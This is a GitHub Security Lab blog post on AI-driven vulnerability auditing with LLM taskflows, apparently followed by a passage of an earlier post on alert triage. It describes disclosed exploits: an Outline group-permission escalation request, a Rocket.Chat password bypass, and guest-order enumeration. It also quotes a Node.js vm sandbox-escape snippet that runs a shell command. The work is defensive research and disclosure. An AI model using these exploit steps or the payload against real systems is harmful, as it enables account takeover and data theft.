How to scan for vulnerabilities with GitHub Security Lab’s open source AI-powered framework

By Man Yue Mo | The GitHub Blog | March 6, 2026

GitHub Security Lab Taskflow Agent is very effective at finding Auth Bypasses, IDORs, Token Leaks, and other high-impact vulnerabilities.

For the last few months, we’ve been using the GitHub Security Lab Taskflow Agent along with a new set of auditing taskflows that specialize in finding web security vulnerabilities. They also turn out to be very successful at finding high-impact vulnerabilities in open source projects. 

As security researchers, we’re used to losing time on possible vulnerabilities that turn out to be unexploitable, but with these new taskflows, we can now spend more of our time manually verifying results and sending out reports. Furthermore, the severity of the vulnerabilities we’re reporting is uniformly high. Many of them are authorization bypass or information disclosure vulnerabilities that allow one user to log in as somebody else or to access the private data of another user.

Using these taskflows, we’ve reported more than 80 vulnerabilities so far. At the time of writing, approximately 20 of them have already been disclosed, and we continually update our advisories page as new vulnerabilities are disclosed. In this blog post, we’ll show a few concrete examples of high-impact vulnerabilities found by these taskflows, like accessing personally identifiable information (PII) in the shopping carts of ecommerce applications or signing in with any password to a chat application.

We’ll also explain how the taskflows work, so you can learn how to write your own. The security community moves faster when it shares knowledge, which is why we’ve made the framework open source and easy to run on your own project. The more teams using and contributing to it, the faster we collectively eliminate vulnerabilities.

How to run the taskflows on your own project

Want to get started right away? The taskflows are open source and easy to run yourself! Please note: a GitHub Copilot license is required, and the prompts will use premium model requests. Running the taskflows can result in many tool calls, which can easily consume a large amount of quota.

  1. Go to the seclab-taskflows repository and start a codespace.
  2. Wait a few minutes for the codespace to initialize.
  3. In the terminal, run ./scripts/audit/run_audit.sh myorg/myrepo

It might take an hour or two to finish on a medium-sized repository. When it finishes, it’ll open an SQLite viewer with the results. Open the “audit_results” table and look for rows with a check-mark in the “has_vulnerability” column.

Tip: Due to the non-deterministic nature of LLMs, it is worthwhile to perform multiple runs of these audit taskflows on the same codebase. In certain cases, a second run can lead to entirely different results. You might also perform those runs using different models (e.g., the first using GPT 5.2 and the second using Claude Opus 4.6).

The taskflows also work on private repos, but you’ll need to modify the codespace configuration to do so because it won’t allow access to your private repos by default.

Introduction to taskflows

Taskflows are YAML files that describe a series of tasks that we want to do with an LLM. With them, we can write prompts to complete different tasks and have tasks that depend on each other. The seclab-taskflow-agent framework takes care of running the tasks sequentially and passing the results from one task to the next.
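As an illustration, a minimal auditing taskflow might look like the sketch below. The field names here are invented for illustration and are not the actual seclab-taskflow-agent schema:

```yaml
# Hypothetical shape of an auditing taskflow. The field names below are
# invented for illustration; the real seclab-taskflow-agent schema differs.
tasks:
  - name: identify_applications
    prompt: |
      Inspect the repository's source code and documentation and divide
      it into components by functionality. Store one record per component.
  - name: identify_entry_points
    depends_on: identify_applications
    for_each: component            # fan out over the stored components
    prompt: |
      For component {{name}}, list the entry points that take untrusted
      input, and note the component's intended privilege and purpose.
```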

For example, when auditing a repository, we first divide it into components according to their functionality. Then, for each component, we collect information such as the entry points through which it receives untrusted input, its intended privilege level, and its purpose. These results are then stored in a database to provide context for subsequent tasks.

Based on the context data, we can then create different auditing tasks. Currently, we have a task that suggests some generic issues for each component and another task that carefully audits each suggested issue. However, it’s also possible to create other tasks, such as tasks with specific focus on a certain type of issue.

These become a list of tasks we specify in a taskflow file.

Diagram of the auditing taskflows, showing the context gathering taskflow communicating with different auditing taskflows via a database named repo_context.db.

We use tasks instead of one big prompt because LLMs have limited context windows, and complex, multi-step tasks are often not completed properly. For example, some steps can be left out. Even though some LLMs have larger context windows, we find that taskflows are still useful in providing a way for us to control and debug the tasks, as well as for accomplishing bigger and more complex projects.

The seclab-taskflow-agent can also run the same task across many components asynchronously (like a for loop). During audits, we often reuse the same prompt and task for every component, varying only the details. The seclab-taskflow-agent lets us define templated prompts, iterate through components, and substitute component-specific details as it runs.
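A minimal sketch of this templated fan-out, with an invented `{{name}}` placeholder syntax and stub data (the agent’s real templating API may differ):

```javascript
// Sketch of the templated-prompt fan-out described above. The template
// syntax and the component list are illustrative, not the agent's real API.
const template =
  'For component "{{name}}", list entry points that take untrusted input.';

// Substitute {{key}} placeholders with values from a vars object.
const renderPrompt = (tpl, vars) =>
  tpl.replace(/{{(\w+)}}/g, (_, key) => vars[key] ?? '');

const components = [{ name: 'server' }, { name: 'cli' }];

// One task definition, instantiated once per component (the "for loop").
const prompts = components.map((c) => renderPrompt(template, c));
```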

Taskflows for general security code audits

After using seclab-taskflow-agent to triage CodeQL alerts, we decided we didn’t want to restrict ourselves to specific types of vulnerabilities and started to explore using the framework for more general security auditing. The main challenge in giving LLMs more freedom is the possibility of hallucinations and an increase in false positives. After all, the success with triaging CodeQL alerts was partly due to the fact that we gave the LLM a very strict and well-defined set of instructions and criteria, so the results could be verified at each stage to see if the instructions were followed. 

So our goal here was to find a good way to allow the LLM the freedom to look for different types of vulnerabilities while keeping hallucinations under control.

We’re going to show how we used agent taskflows to discover high-impact vulnerabilities with a high true-positive rate using just taskflow design and prompt engineering.

General taskflow design

To minimize hallucinations and false positives at the taskflow design level, our taskflow starts with a threat modeling stage, where a repository is divided into components based on functionality, and information such as entry points and the intended use of each component is collected. This information helps us determine the security boundary of each component and how much exposure it has to untrusted input.

The information collected through the threat modeling stage is then used to determine the security boundary of each component and to decide what should be considered a security issue. For example, a command injection in a CLI tool designed to execute any user-supplied script may be a bug but not a security vulnerability, since an attacker able to inject a command through the CLI tool can already execute arbitrary scripts.

At the level of prompts, the intended use and security boundary that is discovered is then used in the prompts to provide strict guidelines as to whether an issue found should be considered a vulnerability or not.

You need to take into account of the intention and threat model of the component in component notes to determine if an issue is a valid security issue or if it is an intended functionality. You can fetch entry points, web entry points and user actions to help you determine the intended usage of the component.

Asking an LLM something as vague as looking for any type of vulnerability anywhere in the code base would give poor results with many hallucinated issues. Ideally, we’d like to simulate the triage environment where we have some potential issues as the starting point of analysis and ask the LLM to apply rigorous criteria to determine whether the potential issue is valid or not.

To bootstrap this process, we break the auditing task into two steps. 

  • First, we ask the LLM to go through each component of the repository and suggest types of vulnerabilities that are more likely to appear in the component. 
  • These suggestions are then passed to another task, where they will be audited according to rigorous criteria. 

In this setup, the suggestions from the first step act like inaccurate vulnerability alerts flagged by an “external tool,” while the second step serves as a triage step. While this may look like a self-validating process, breaking it into two steps, each with a fresh context and a different prompt, allows the second step to provide an accurate assessment of the suggestions.
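The two-step setup can be sketched as follows, with `askLLM` as a stand-in for a real model call. The point is that the audit step starts from an empty context and sees only the suggestion text, not the suggestion task’s reasoning:

```javascript
// Sketch of the suggest-then-audit pipeline. askLLM is a stub standing in
// for a real model call; the prompts and return values are invented.
const askLLM = (context, prompt) => {
  context.push(prompt); // each task accumulates only its own context
  return prompt.startsWith('Suggest')
    ? ['IDOR in user update endpoint'] // fabricated example suggestion
    : { hasVulnerability: false, evidence: 'checked handler, auth present' };
};

function suggestIssues(component) {
  const context = []; // fresh context for the suggestion task
  return askLLM(context, `Suggest likely vulnerability types for ${component}`);
}

function auditIssue(component, issue) {
  const context = []; // fresh context: the audit inherits only the issue text
  return askLLM(context, `Audit ${component} for: ${issue}`);
}

const suggestions = suggestIssues('server');
const verdicts = suggestions.map((s) => auditIssue('server', s));
```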

We’ll now go through these tasks in detail.

Threat modeling stage

When triaging alerts flagged by automatic code scanning tools, we found that a large proportion of false positives results from improper threat modeling. Most static analysis tools do not take into account the intended usage and security boundary of the source code and often give results that have no security implications. For example, in a reverse proxy application, many SSRF (server-side request forgery) vulnerabilities flagged by automated tools are likely to fall within the intended use of the application, while some web services, such as those used in continuous integration pipelines, are designed to execute arbitrary code and scripts within a sandboxed environment. Remote code execution vulnerabilities in these applications without a sandbox escape are generally not considered a security risk.

Given these caveats, it pays to first go through the source code to get an understanding of the functionalities and intended purpose of code. We divide this process into the following tasks: 

  • Identify applications: A GitHub repository is an imperfect boundary for auditing: It may be a single component within a larger system or contain multiple components, so it’s worth identifying and auditing each component separately to match distinct security boundaries and keep scope manageable. We do this with the identify_applications taskflow, which asks the LLM to inspect the repository’s source code and documentation and divide it into components by functionality. 
  • Identify entry points: We identify how each entry point is exposed to untrusted inputs to better gauge risk and anticipate likely vulnerabilities. Because “untrusted input” varies significantly between libraries and applications, we provide separate guidelines for each case.
  • Identify web entry points: This is an extra step to gather further information about entry points in the application and append information that is specific to web application entry points such as noting the HTTP method and paths that are required to access a certain endpoint. 
  • Identify user actions: We have the LLM review the code and identify what functionality a user can access under normal operation. This clarifies the user’s baseline privileges, helps assess whether vulnerabilities could enable privilege gains, and informs the component’s security boundary and threat model, with separate instructions depending on whether the component is a library or an application. 

At each of the above steps, information gathered about the repository is stored in a database. This includes components in the repository, their entry points, web entry points, and intended usage. This information is then available for use in the next stage.
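As a rough sketch of the kind of per-component record the taskflows persist (an in-memory stand-in here; the real repo_context.db schema may differ, and the field values are illustrative):

```javascript
// In-memory stand-in for the repo_context.db component store.
// The record fields mirror the information the text describes: entry
// points, web entry points, user actions, and intended usage.
const repoContext = new Map();

function saveComponent(record) {
  repoContext.set(record.id, record);
}

saveComponent({
  id: 2,
  name: 'server (backend API)',
  entryPoints: [{ method: 'POST', path: '/api/documents.add_group' }],
  userActions: ['read documents', 'edit documents with ReadWrite membership'],
  intendedUse: 'multi-user collaboration backend with per-document ACLs',
});

// Later stages read the stored context instead of re-deriving it.
const ctx = repoContext.get(2);
```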

Issue suggestion stage

At this stage, we instruct the LLM to suggest some types of vulnerabilities, or a general area of high security risk for each component based on the information about the entry point and intended use of the component gathered from the previous step. In particular, we put emphasis on the intended usage of the component and its risk from untrusted input:

Base your decision on:
- Is this component likely to take untrusted user input? For example, remote web request or IPC, RPC calls?
- What is the intended purpose of this component and its functionality? Does it allow high privileged action?
Is it intended to provide such functionalities for all user? Or is there complex access control logic involved?
- The component itself may also have its own `README.md` (or a subdirectory of it may have a `README.md`). Take a look at those files to help understand the functionality of the component.

We also explicitly instruct the LLM to not suggest issues that are of low severity or are generally considered non-security issues.

However, you should still take care not to include issues that are of low severity or requires unrealistic attack scenario such as misconfiguration or an already compromised system.

In general, we keep this stage relatively free of restrictions and allow the LLM freedom to explore and suggest different types of vulnerabilities and potential security issues. The idea is to have a reasonable set of focus areas and vulnerability types for the actual auditing task to use as a starting point.

One problem we ran into was that the LLM would sometimes start auditing the issues that it suggested, which would defeat the purpose of the brainstorming phase. To prevent this, we instructed the LLM to not audit the issues.

Issue audit stage

This is the final stage of the taskflows. Once we’ve gathered all the information we need about the repository and have suggested some types of vulnerabilities and security risks to focus on, the taskflow goes through each suggested issue and audits them by going through the source code. At this stage, the task starts with fresh context to scrutinize the issues suggested from the previous stage. The suggestions are considered to be unvalidated, and this taskflow is instructed to verify these issues:

The issues suggested have not been properly verified and are only suggested because they are common issues in these types of application. Your task is to audit the source code to check if this type of issues is present.

To avoid the LLM coming up with issues that are non-security related in the context of the component, we once again emphasize that intended usage must be taken into consideration.

You need to take into account of the intention and threat model of the component in component notes to determine if an issue is a valid security issue or if it is an intended functionality.

To avoid the LLM hallucinating issues that are unrealistic, we also instruct it to provide a concrete and realistic attack scenario and to only consider issues that stem from errors in the source code:

Do not consider scenarios where authentication is bypassed via stolen credential etc. We only consider situations that are achievable from within the source code itself.
...
If you believe there is a vulnerability, then you must include a realistic attack scenario, with details of all the file and line included, and also what an attacker can gain by exploiting the vulnerability. Only consider the issue a vulnerability if an attacker can gain privilege by performing an action that is not intended by the component.

To further reduce hallucinations, we also instruct the LLM to provide concrete evidence from the source code, with file path and line information:

Keep a record of the audit notes, be sure to include all relevant file path and line number. Just stating an end point, e.g. `IDOR in user update/delete endpoints (PUT /user/:id)` is not sufficient. I need to have the file and line number.

Finally, we also instruct the LLM that it is possible that there is no vulnerability in the component and that it should not make things up:

Remember, the issues suggested are only speculation and there may not be a vulnerability at all and it is ok to conclude that there is no security issue.

The emphasis of this stage is to provide accurate results while following strict guidelines—and to provide concrete evidence of the findings. With all these strict instructions in place, the LLM indeed rejects many unrealistic and unexploitable suggestions with very few hallucinations. 

The first prototype was designed with hallucination prevention as a priority, which raised a question: Would it become too conservative, rejecting most vulnerability candidates and failing to surface real issues?

The answer is clear after we ran the taskflow on a few repositories.

Three examples of vulnerabilities found by the taskflows

In this section, we’ll show three examples of vulnerabilities that were found by the taskflows and that have already been disclosed. In total, we have found and reported over 80 vulnerabilities so far. We publish all disclosed vulnerabilities on our advisories page.

Privilege escalation in Outline (CVE-2025-64487)

Our information-gathering taskflows are optimized toward web applications, which is why we first pointed our audit taskflows to a collaborative web application called Outline.

Outline is a multi-user collaboration suite with properties we were especially interested in: 

  • Documents have owners and different visibility, with permissions per users and teams.
  • Access rules like that are hard to analyze with a Static Application Security Testing (SAST) tool, since they use custom access mechanisms and existing SAST tools typically don’t know what actions a normal “user” should be able to perform. 
  • Such permission schemes are often also hard for humans to analyze by reading the source code alone (if you didn’t create the scheme yourself, that is).

Screenshot showing an opened document in Outline. Outline is a collaborative web application.

And success: Our taskflows found a bug in the authorization logic on the very first run!

The notes in the audit results read like this:

Audit target: Improper membership management authorization in component server (backend API) of outline/outline (component id 2).

Summary conclusion: A real privilege escalation vulnerability exists. The document group membership modification endpoints (documents.add_group, documents.remove_group) authorize with the weaker "update" permission instead of the stronger "manageUsers" permission that is required for user membership changes. Because "update" can be satisfied by having only a ReadWrite membership on the document, a non‑admin document collaborator can grant (or revoke) group memberships – including granting Admin permission – thereby escalating their own privileges (if they are in the added group) and those of other group members. This allows actions (manageUsers, archive, delete, etc.) that were not intended for a mere ReadWrite collaborator.

Reading the TypeScript-based source code and verifying this finding on a test instance revealed that it was exploitable exactly as described. In addition, the described steps to exploit this vulnerability were on point:

Prerequisites:
- Attacker is a normal team member (not admin), not a guest, with direct ReadWrite membership on Document D (or via a group that grants ReadWrite) but NOT Admin.
- Attacker is a member of an existing group G in the same team (they do not need to be an admin of G; group read access is sufficient per group policy).

Steps:
1. Attacker calls POST documents.add_group (server/routes/api/documents/documents.ts lines 1875-1926) with body:
   {
     "id": "<document-D-id>",
     "groupId": "<group-G-id>",
     "permission": "admin"
   }
2. Authorization path:
   - Line 1896: authorize(user, "update", document) succeeds because attacker has ReadWrite membership (document.ts lines 96-99 allow update).
   - Line 1897: authorize(user, "read", group) succeeds for any non-guest same-team user (group.ts lines 27-33).
   No "manageUsers" check occurs.
3. Code creates or updates GroupMembership with permission Admin (lines 1899-1919).
4. Because attacker is a member of group G, their effective document permission (via groupMembership) now includes DocumentPermission.Admin.
5. With Admin membership, attacker now satisfies includesMembership(Admin) used in:
   - manageUsers (document.ts lines 123-134) enabling adding/removing arbitrary users via documents.add_user / documents.remove_user (lines 1747-1827, 1830-1872).
   - archive/unarchive/delete (document.ts archive policy lines 241-252; delete lines 198-208) enabling content integrity impact.
   - duplicate, move, other admin-like abilities (e.g., duplicate policy lines 136-153; move lines 155-170) beyond original ReadWrite scope.

Using these instructions, a low-privileged user could add arbitrary groups to a document that the user was only allowed to update (the user not being in possession of the “manageUsers” permission that was typically required for such changes).

In this sample, the group “Support” was added to the document by the low-privileged user named “gg.”

A screenshot of the share/document permissions functionality in Outline. The group “Support” was added by the “gg@test.test” user without having enough permissions for that action.

The Outline project fixed this and another issue we reported within three days! (Repo advisory)

The shopping cartocalypse (CVE-2025-15033, CVE-2026-25758)

We didn’t realize what systematic issues we’d uncover in the cart logic of ecommerce applications until we pointed our taskflows at the first online shop on our list. In the PHP-based WooCommerce project, the taskflows promptly found a way for normally signed-in shop users to view all guest orders, including personally identifiable information such as names, addresses, and phone numbers. After we reported this, Automattic (the company behind WooCommerce) quickly released an update (CVE-2025-15033) and an accompanying blog post.

Intrigued by that vulnerability, we’ve added additional ecommerce applications to our list of applications to be audited by our agent. And sure enough, we found more vulnerabilities. The popular Ruby-based Spree commerce application contained two similar vulnerabilities (CVE-2026-25758 and CVE-2026-25757). The more critical one allowed unauthenticated users to simply enumerate the addresses (and phone numbers) of all guest orders by more or less incrementing a sequential number.

In this screenshot, the attacker “test66” linked their session to an existing address of a guest user, thus being able to view the full address and phone number.

An unauthenticated guest user revealing addresses of other guest users by enumerating through them.

Our bug-hunting spree didn’t stop with Spree. Our taskflows uncovered similar issues in two additional ecommerce applications.

These authorization logic bugs had been undiscovered for years.

Signing in to Rocket.Chat using any password (CVE-2026-28514)

(This is not what passwordless authentication should look like!)

Every so often you can’t believe your eyes. This finding reported by our taskflows in Rocket.Chat was one of those moments.

When your agent comes back with a note like this:

VULNERABILITY: password authentication bypass in account-service allows logging in as any user with a password set.

You might find it hard to believe at first.

When you then continue reading the output:

Root cause:
- ee/apps/account-service/src/lib/utils.ts:60-61: `validatePassword` returns `Promise<boolean>` (bcrypt.compare(...)).
- ee/apps/account-service/src/lib/loginViaUsername.ts:18-21: `const valid = user.services?.password?.bcrypt && validatePassword(password, user.services.password.bcrypt);` but does NOT `await` the Promise; since a Promise is truthy, `if (!valid) return false;` is never triggered when bcrypt hash exists.
- ee/apps/account-service/src/lib/loginViaUsername.ts:23-35: proceeds to mint a new login token and saves it, returning `{ uid, token, hashedToken, tokenExpires }`.

It might make more sense, but you’re still not convinced.

It turns out the suspected finding is in the microservices-based setup of Rocket.Chat. In that particular setup, Rocket.Chat exposes its user account service via its DDP Streamer service.

Rocket.Chat’s microservices deployment. Copyright Rocket.Chat. (This architecture diagram is from Rocket.Chat’s documentation.)

Once our Rocket.Chat test setup was working properly, we had to write proof of concept code to exploit this potential vulnerability. The notes of the agent already contained the JSON construct that we could use to connect to the endpoint using Meteor’s DDP protocol.

We connected to the WebSocket endpoint for the DDP streamer service, and yes: it was truly possible to log in to the exposed Rocket.Chat DDP service using any password. Once signed in, it was also possible to perform other operations, such as connecting to arbitrary chat channels and listening for messages sent to those channels.

Here we received the message “HELLO WORLD!!!” while listening on the “General” channel.

The proof of concept code connected to the DDP streamer endpoint received “HELLO WORLD!!!” in the general channel.

The technical details of this issue are interesting (and scary as well). Rocket.Chat, primarily a TypeScript-based web application, uses bcrypt to store local user passwords. The bcrypt.compare function (used to compare a password against its stored hash) returns a Promise—a fact that is reflected in Rocket.Chat’s own validatePassword function, which returns Promise<boolean>:

export const validatePassword = (password: string, bcryptPassword: string): Promise<boolean> =>
    bcrypt.compare(getPassword(password), bcryptPassword);

However, when that function was used, the returned Promise was never awaited (e.g., by adding an `await` keyword in front of validatePassword):

const valid = user.services?.password?.bcrypt && validatePassword(password, user.services.password.bcrypt);

if (!valid) {
    return false;
}

This meant that valid was assigned the Promise returned by validatePassword: the && expression evaluates the (truthy) stored bcrypt hash and then yields its right-hand operand, the Promise itself. Since a Promise object is always “truthy” in JavaScript terms, the boolean valid was subsequently always truthy when a user had a bcrypt password set.
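The bug class is easy to reproduce in isolation. The snippet below is our minimal stand-in, not Rocket.Chat’s code: an async check used without `await` always passes, while the awaited version behaves correctly.

```javascript
// Stand-in for bcrypt.compare: an async check that (correctly) fails.
const checkAsync = async () => false;

// BUG: without `await`, `&&` yields the Promise object itself,
// and any object is truthy, so the check "passes" regardless.
const buggyValid = true && checkAsync();
const buggyPasses = Boolean(buggyValid); // true, even though the check failed

// FIX: settle the Promise with `await` before testing it.
async function fixedCheck() {
  const valid = true && (await checkAsync());
  return Boolean(valid); // false, as intended
}
```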

Severity aside, it’s fascinating that the LLM was able to pick up this rather subtle bug, follow it through multiple files, and arrive at the correct conclusion.

What we learned

After running the taskflows over 40 repositories—mostly multi-user web applications—the LLM suggested 1,003 issues (potential vulnerabilities). 

After the audit stage, 139 were marked as having vulnerabilities, meaning that the LLM decided they were exploitable. After deduplicating the issues—duplicates happen because each repository is run a couple of times on average and the results are aggregated—we ended up with 91 vulnerabilities, which we decided to manually inspect before reporting.

  • We rejected 20 (22%) results as FP: False Positives that we couldn’t reproduce manually.
  • We rejected 52 (57%) results as low severity: issues that have very limited potential impact (e.g., blind SSRF with only an HTTP status code returned, or issues that require a malicious admin during the installation stage).
  • We kept 19 (21%) results that we considered impactful enough to report, all serious vulnerabilities, with the majority having high or critical severity (e.g., vulnerabilities that can be triggered without specific requirements and that impact confidentiality or integrity, such as disclosure of personal data, overwriting of system settings, or account takeover).
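The review funnel above, written out as plain arithmetic (numbers taken from the text; percentages are relative to the 91 deduplicated findings):

```javascript
// Triage funnel: 1,003 suggestions -> 139 flagged -> 91 after dedup
// -> manual review outcomes. All figures are from the text above.
const suggested = 1003;
const flagged = 139;
const deduped = 91;
const outcomes = { falsePositive: 20, lowSeverity: 52, reported: 19 };

const pct = (n, d) => Math.round((n / d) * 100);
const review = {
  falsePositive: pct(outcomes.falsePositive, deduped), // ~22%
  lowSeverity: pct(outcomes.lowSeverity, deduped),     // ~57%
  reported: pct(outcomes.reported, deduped),           // ~21%
};
```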

This data was collected using gpt-5.x as the model for code analysis and audit tasks.

Note that we have run the taskflows on more repositories since this data was collected, so this table does not represent all the data we’ve collected and all vulnerabilities we’ve reported.

Issue category                                         All   Has vulnerability   Vulnerability rate
IDOR/Access control issue                              241                  38                15.8%
XSS                                                    131                  17                13.0%
CSRF                                                   110                  17                15.5%
Authentication issue                                    91                  15                16.5%
Security misconfiguration                               75                  13                17.3%
Path traversal                                          61                  10                16.4%
SSRF                                                    45                   7                15.6%
Command injection                                       39                   5                12.8%
Remote code execution                                   24                   1                 4.2%
Business logic issue                                    24                   6                25.0%
Template injection                                      24                   1                 4.2%
File upload handling issues (excludes path traversal)   18                   2                11.1%
Insecure deserialization                                17                   0                 0.0%
Open redirect                                           16                   0                 0.0%
SQL injection                                            9                   0                 0.0%
Sensitive data exposure                                  8                   0                 0.0%
XXE                                                      4                   0                 0.0%
Memory safety                                            3                   0                 0.0%
Others                                                  66                   7                10.6%

If we divide the findings into two rough categories—logical issues (IDOR, authentication, security misconfiguration, business logic issues, sensitive data exposure) and technical issues (XSS, CSRF, path traversal, SSRF, command injection, remote code execution, template injection, file upload issues, insecure deserialization, open redirect, SQL injection, XXE, memory safety)—we get 439 logical issues and 501 technical issues. Although more technical issues were suggested, the difference isn’t significant because some broad categories (such as remote code execution and file upload issues) can also involve logical issues depending on the attacker scenario.
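The rough split can be recomputed directly from the table (category counts copied from the table above):

```javascript
// Logical vs. technical split, using the "All" column from the table.
const logical = {
  idor: 241, authentication: 91, misconfiguration: 75,
  businessLogic: 24, sensitiveData: 8,
};
const technical = {
  xss: 131, csrf: 110, pathTraversal: 61, ssrf: 45, cmdInjection: 39,
  rce: 24, templateInjection: 24, fileUpload: 18, deserialization: 17,
  openRedirect: 16, sqli: 9, xxe: 4, memorySafety: 3,
};

const sum = (o) => Object.values(o).reduce((a, b) => a + b, 0);
const logicalTotal = sum(logical);     // 439
const technicalTotal = sum(technical); // 501
```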

Only three suggested issues concern memory safety. This isn’t too surprising, given that the majority of the repositories tested are written in memory-safe languages. But we also suspect that the current taskflows may not be very efficient at finding memory-safety issues, especially compared to other automated tools such as fuzzers. This is an interesting area that can be improved by creating more specific taskflows and making more tools, like fuzzers, available to the LLM.

This data led us to the following observations.

LLMs are particularly good at finding logic bugs

What stands out from the data is the 25% rate for “Business logic issue” and the large number of IDOR issues. In fact, the total number of IDOR issues flagged as vulnerable is greater than the next two categories combined (XSS and CSRF). Overall, we get the impression that the LLM does an excellent job of understanding the codebase and following the control flow while taking into account the access control model and intended usage of the application, which is more or less what we’d expect from LLMs that excel at tasks like code review. This also makes it great for finding logic bugs that are difficult to find with traditional tools.

LLMs are good at rejecting low-severity issues and false positives

Curiously, none of the false positives are what we’d consider to be hallucinations. All the reports, including the false positives, have sound evidence backing them up, and we were able to follow each report to locate the endpoints and apply the suggested payload. Many of the false positives are due to circumstances beyond what is visible in the code, such as browser mitigations for XSS, or are genuine mistakes that a human auditor is also likely to make. For example, when multiple layers of authentication are in place, the LLM could sometimes miss some of the checks, resulting in false positives.

We have since tested more repositories with more vulnerabilities reported, but the ratio between vulnerabilities and repositories remains roughly the same.

To demonstrate the extensibility of taskflows and how extra information can be incorporated into them, we created a new taskflow to run after the audit stage that uses our newfound knowledge to filter out low-severity vulnerabilities. We found that it can filter out roughly 50% of the low-severity vulnerabilities, although a couple of borderline vulnerabilities that we did report were also marked as low severity. The taskflow and the prompt can be adjusted to fit the user’s own preference; for us, we’re happy to keep it more inclusive so we don’t miss anything impactful.

LLMs are good at threat modeling

The LLM performs well at threat modeling in general. During the experiment, we tested it on a number of applications with different threat models, such as desktop applications, multi-tenant web applications, applications that are designed to run code in sandbox environments (code injection by design), and reverse proxy applications (applications where SSRF-like behavior is intended). The taskflow is able to take into account the intended usage of these applications and make sound decisions. It struggles most with the threat modeling of desktop applications, as it is often unclear whether other processes running on the user’s desktop should be considered trusted or not.

We’ve also observed some remarkable reasoning by the LLM that excludes issues with no privilege gains. For example, in one case, the LLM noticed that while there are inconsistencies in access control, the issue does not give the attacker any advantages over a manual copy and paste action:

Security impact assessment:

A user possessing only read access to a document (no update rights) can duplicate it provided they also have updateDocument rights on the destination collection. This allows creation of a new editable copy of content they could already read. This does NOT grant additional access to other documents nor bypass protections on the original; any user with read access could manually copy-paste the content into a new document they are permitted to create (creation generally allowed for non-guest, non-viewer members in ReadWrite collections per createDocument collection policy)

We’ve also seen some more sophisticated techniques used in the reasoning. For example, in one application that runs scripts in a sandboxed Node.js environment, the LLM suggested the following technique to escape the sandbox:

In Node’s vm, passing any outer-realm function into a contextified sandbox leaks that function’s outer-realm Function constructor through the `constructor` property. From inside the sandbox:
  const F = console.log.constructor; // outer-realm Function
  const hostProcess = F('return process')(); // host process object
  // Bypass module allowlist via host dynamic import
  const cp = await F('return import("node:child_process")')();
  const out = cp.execSync('id').toString();
  return [{ json: { out } }];

The presence of host functions (console.log, timers, require, RPC methods) is sufficient to obtain the host Function constructor and escape the sandbox. The allowlist in require-resolver is bypassed by constructing host-realm functions and using dynamic import of built-in modules (e.g., node:child_process), which does not go through the sandbox’s custom require.

While the result turns out to be a false positive due to other mitigating factors, it demonstrates the LLM’s technical knowledge.

Get involved!

The taskflows we used to find these vulnerabilities are open source and easy to run on your own project, so we hope you’ll give them a try! We also want to encourage you to write your own taskflows. The results showcased in this blog post are just small examples of what’s possible. There are other types of vulnerabilities to find, and there are other security-related problems, like triaging SAST results or building development setups, which we think taskflows can help with. Let us know what you’re building by starting a discussion on our repo!

AI-supported vulnerability triage with the GitHub Security Lab Taskflow Agent
https://github.blog/security/ai-supported-vulnerability-triage-with-the-github-security-lab-taskflow-agent/
Tue, 20 Jan 2026 19:52:50 +0000

Learn how we are using the newly released GitHub Security Lab Taskflow Agent to triage categories of vulnerabilities in GitHub Actions and JavaScript projects.
Triaging security alerts is often very repetitive because false positives are caused by patterns that are obvious to a human auditor but difficult to encode as a formal code pattern. But large language models (LLMs) excel at matching the fuzzy patterns that traditional tools struggle with, so we at the GitHub Security Lab have been experimenting with using them to triage alerts. We are using our recently announced GitHub Security Lab Taskflow Agent AI framework to do this and are finding it to be very effective.

💡 Learn more about it and see how to activate the agent in our previous blog post.

In this blog post, we’ll introduce these triage taskflows, showcase results, and share tips on how you can develop your own, whether for triage or for other security research workflows.

By using the taskflows described in this post, we quickly triaged a large number of code scanning alerts and have discovered many (~30) real-world vulnerabilities since August, many of which have already been fixed and published. When triaging the alerts, the LLMs were only given tools to perform basic file fetching and searching. We did not use any static or dynamic code analysis tools, other than CodeQL to generate the alerts in the first place.

While this blog post showcases how we used LLM taskflows to triage CodeQL alerts, the general process applies to building any automation with LLMs and taskflows. Your process will be a good candidate for this if:

  1. You have a task that involves many repetitive steps, and each one has a clear and well-defined goal.
  2. Some of those steps involve looking for logic or semantics in code that are not easy for conventional programming to identify, but are fairly easy for a human auditor to spot. Trying to identify them programmatically often results in piles of monkey-patched heuristics, badly written regexps, etc. (These are potential sweet spots for LLM automation!)

If your project meets those criteria, then you can create taskflows to automate these sweet spots using LLMs, and use MCP servers to perform tasks that are well suited for conventional programming.

Both the seclab-taskflow-agent and seclab-taskflows repos are open source, allowing anyone to develop LLM taskflows to perform similar tasks. At the end of this blog post, we’ll also give some development tips that we’ve found useful.

Introduction to taskflows

Taskflows are YAML files that describe a series of tasks that we want to do with an LLM. In this way, we can write prompts to complete different tasks and have tasks that depend on each other. The seclab-taskflow-agent framework takes care of running the tasks one after another and passing the results from one task to the next.

For example, when auditing CodeQL alert results, we first want to fetch the code scanning results. Then, for each result, we may have a list of tasks that we need to check. For example, we may want to check if an alert can be reached by an untrusted attacker and whether there are authentication checks in place. These become a list of tasks we specify in a taskflow file.

Simplified depiction of taskflow with three tasks in order: fetch code scanning results, audit each result, create issues containing verdict.

We use tasks instead of one big prompt because LLMs have limited context windows, and complex, multi-step tasks often are not completed properly. Some steps are frequently left out, so having a taskflow to organize the task avoids these problems. Even with LLMs that have larger context windows, we find that taskflows are useful to provide a way for us to control and debug the task, as well as to accomplish bigger and more complex tasks.

The seclab-taskflow-agent can also perform a batch “for loop”-style task asynchronously. When we audit alerts, we often want to apply the same prompts and tasks to every alert, but with different alert details. The seclab-taskflow-agent allows us to create templated prompts to iterate through the alerts and replace the details specific to each alert when running the task.
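Putting these pieces together, a taskflow might be sketched roughly as below. To be clear, the field names here are hypothetical and for illustration only; the actual schema is documented in the seclab-taskflow-agent repo.

```yaml
# Hypothetical sketch, not the agent's real schema.
tasks:
  - name: fetch_alerts
    prompt: "Fetch the open code scanning alerts for {{ repo }}."
  - name: audit_alert
    # "for loop"-style task: a fresh context per alert, with the
    # templated details of each alert substituted into the prompt.
    repeat_over: fetch_alerts.results
    prompt: |
      For alert {{ alert_id }}, check whether the flagged code is
      reachable by an untrusted attacker and whether authentication
      checks are in place. Record findings with file and line references.
  - name: create_issues
    prompt: "Create a GitHub Issue containing the verdict for each audited alert."
```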

Triaging taskflows from a code scanning alert to a report

The GitHub Security Lab periodically runs a set of CodeQL queries against a selected set of open source repositories. The process of triaging these alerts is usually fairly repetitive, and for some alerts, the causes of false positives are usually fairly similar and can be spotted easily. 

